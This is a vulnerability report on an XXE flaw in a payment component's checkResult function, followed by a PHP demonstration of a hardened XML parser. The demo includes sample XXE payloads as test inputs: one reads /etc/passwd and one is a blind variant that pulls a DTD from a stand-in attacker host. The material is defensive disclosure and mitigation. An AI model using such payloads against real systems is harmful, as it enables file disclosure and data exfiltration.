In class Pay2PayPayment (application\components\payment\Pay2PayPayment.php), there is an XXE vulnerability in the checkResult function.
The user input ($_POST['xml']) has been put into simplexml_load_string without sanitization.
Although this parser does not print anything, attackers could also use blind XXE to get sensitive information.
You could use libxml_disable_entity_loader(true); to avoid this vulnerability. Thx
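As an added illustration (this is not code from the project, whose checkResult body is not shown in the issue): a hypothetical function with the shape of the reported flaw, beside a hardened helper that applies the suggested libxml_disable_entity_loader(true) fix together with two checks a reviewer would want, a DTD rejection and LIBXML_NONET. The function names and the three sample XML documents are assumptions constructed for the demo; hostnames use the reserved .invalid domain.

```php
<?php
// Added example, not the project's code. checkResult_vulnerable,
// parse_untrusted_xml and the sample payloads are hypothetical.

// Hypothetical shape of the flaw the issue describes: POST data goes straight
// into simplexml_load_string. Whether an external entity is actually fetched
// depends on the libxml version and on options such as LIBXML_NOENT, but the
// DOCTYPE is never inspected, so an attacker controls the DTD.
function checkResult_vulnerable(string $postedXml)
{
    return simplexml_load_string($postedXml);
}

// Hardened replacement: refuse any DTD, disable the external entity loader
// where it is still on, and parse with network access forbidden.
function parse_untrusted_xml(string $xml): SimpleXMLElement
{
    // Every entity-based attack (in-band XXE, blind/out-of-band XXE via
    // parameter entities, entity-expansion DoS) needs a DOCTYPE, and a
    // payment callback has no legitimate reason to carry one.
    if (preg_match('/<!DOCTYPE/i', $xml) === 1) {
        throw new InvalidArgumentException('DTD not allowed in untrusted XML');
    }

    // libxml_disable_entity_loader() is the fix suggested in the issue; it is
    // a process-wide switch, so the previous value is restored afterwards.
    // It is deprecated on PHP >= 8.0, where external loading is already off.
    $prevLoader = null;
    if (PHP_VERSION_ID < 80000) {
        $prevLoader = libxml_disable_entity_loader(true);
    }
    $prevErrors = libxml_use_internal_errors(true);
    try {
        // LIBXML_NONET forbids network fetches during parsing. LIBXML_NOENT
        // is deliberately absent: setting it would substitute entities.
        $doc = simplexml_load_string($xml, SimpleXMLElement::class, LIBXML_NONET);
        if ($doc === false) {
            $msg = implode('; ', array_map(fn($e) => trim($e->message), libxml_get_errors()));
            libxml_clear_errors();
            throw new InvalidArgumentException('malformed XML: ' . $msg);
        }
        return $doc;
    } finally {
        libxml_use_internal_errors($prevErrors);
        if ($prevLoader !== null) {
            libxml_disable_entity_loader($prevLoader);
        }
    }
}

// Constructed sample inputs (not real payment traffic).
$benign = '<?xml version="1.0"?><payment><order_id>42</order_id><status>success</status></payment>';
$inBandXxe = '<?xml version="1.0"?><!DOCTYPE p [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
           . '<payment><order_id>&xxe;</order_id></payment>';
// Blind/out-of-band variant: a parameter entity that makes the parser fetch an
// attacker-controlled DTD; the parser need not print anything for data to leak.
$blindXxe = '<?xml version="1.0"?><!DOCTYPE p [<!ENTITY % dtd SYSTEM "http://attacker.invalid/evil.dtd"> %dtd;]>'
          . '<payment><order_id>42</order_id></payment>';

foreach (['benign' => $benign, 'in-band XXE' => $inBandXxe, 'blind XXE' => $blindXxe] as $label => $xml) {
    try {
        $doc = parse_untrusted_xml($xml);
        printf("%-12s accepted, order_id=%s\n", $label, (string) $doc->order_id);
    } catch (InvalidArgumentException $e) {
        printf("%-12s rejected: %s\n", $label, $e->getMessage());
    }
}
```

Run with php on the command line: the benign document is accepted and both DOCTYPE-bearing documents are rejected before libxml ever sees the DTD. The DOCTYPE check is the part that also covers the blind case the issue points out, since disabling the entity loader alone still lets the parser process a declared DTD.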